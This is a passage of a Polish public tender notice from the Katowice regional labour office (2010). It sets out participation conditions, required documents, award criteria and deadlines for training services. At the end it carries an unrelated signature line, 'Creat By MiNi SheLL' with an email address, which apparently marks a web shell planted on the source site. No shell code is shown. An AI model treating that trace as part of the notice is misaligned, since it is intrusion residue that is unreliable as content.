a powierzchnia mieszkalna pokoi nie może być mniejsza niż 10 m2, w całorocznych obiektach hotelarskich lub innych obiektach, w których świadczone są usługi hotelarskie o standardzie co najmniej trzygwiazdkowym, położnym na terenie województwa śląskiego, w regionie Podbeskidzia,

2)	dysponują salą konferencyjną dla 20 osób, wyposażoną w co najmniej: rzutnik multimedialny, laptop, tablice flipchart, 

3)	dysponują autokarem do przewozu osób w ilości nie mniejszej niż 20 osób,  


Część III
1)	dysponują w dniach: 
-	11 czerwca 2010 r.
-	14 czerwca 2010 r.
-	18 czerwca 2010 r. 
salą konferencyjną na terenie miasta Katowice, dla 20 osób, wyposażoną w co najmniej: rzutnik multimedialny, laptop, tablice typu flipchart, 


Opis sposobu dokonywania oceny spełnienia tego warunku
Wykonawca przedstawi oświadczenie - załącznik do SIWZ - Nr 7.I.; Nr 7.II.; Nr 7.III.; Nr 8.I.; Nr 8.II., a Zamawiający dokona oceny spełnienia warunków wg formuły: -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
1)	dysponują co najmniej dwoma wykładowcami, którzy będą uczestniczyć w wykonywaniu zamówienia, przy czym każdy wykaże się przeprowadzeniem co najmniej 3 szkoleń w zakresie  metod i narzędzi w pośrednictwie pracy;

Część II
1)	dysponują co najmniej jednym wykładowcą, który uczestniczyć będzie w wykonywaniu zamówienia, legitymującym się przeprowadzeniem co najmniej 3 szkoleń  w zakresie obsługi i aktywizacji zawodowej klientów niepełnosprawnych;

Część III
1)	dysponują co najmniej jednym wykładowcą, który będzie uczestniczył w wykonywaniu zamówienia, legitymującym się przeprowadzeniem co najmniej 3 szkoleń w zakresie outplacement;

Opis sposobu dokonywania oceny spełnienia tego warunku - nie dotyczy
Wykonawca przedstawi wykaz osób wraz z dokumentami, a Zamawiający dokona oceny spełnienia warunków na podstawie złożonego wykazu i dokumentów - załącznik do SIWZ - Nr 6.I.; Nr 6.II.; Nr 6.III.; - wg formuły: -spełnia-nie spełnia-. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.1.2). W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie Wykonawcy - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy
ul. Kościuszki 30
40-048 Katowice
III piętro, pokój 304-305 Wojewódzkiego Urzędu Pracy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy
ul. Kościuszki 30
40-048 Katowice
III piętro, pokój 352.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com